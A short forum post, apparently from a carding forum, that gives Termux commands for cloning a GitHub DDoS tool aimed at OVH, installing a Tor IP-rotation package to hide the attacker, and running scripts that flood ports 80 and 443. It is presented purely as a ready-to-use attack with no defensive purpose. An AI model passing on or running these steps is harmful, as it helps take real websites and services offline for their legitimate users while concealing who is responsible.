DDos attack via Termux

CarderPlanet

Professional
Messages
2,557
Reputation
7
Reaction score
546
Points
83
DDoS attacks (Distributed Denial of Service) are attacks on computing systems (network resources or communication channels) aimed at making them inaccessible to legitimate users.

Installation
Code:
▪️apt update & apt upgrade -y && pkg install python git -y
▪️git clone https://github.com/HardyTomas/DDos-Attack-OVH-
▪️cd DDos-Attack-OVH-
▪️pip install toripchanger
▪️pip install -r requirements.txt

Usage
Code:
▪️python 80port.py

Also, you can attack port 443 (https)
Code:
▪️python 443port.py

Dose in the hut ✌️
 
Top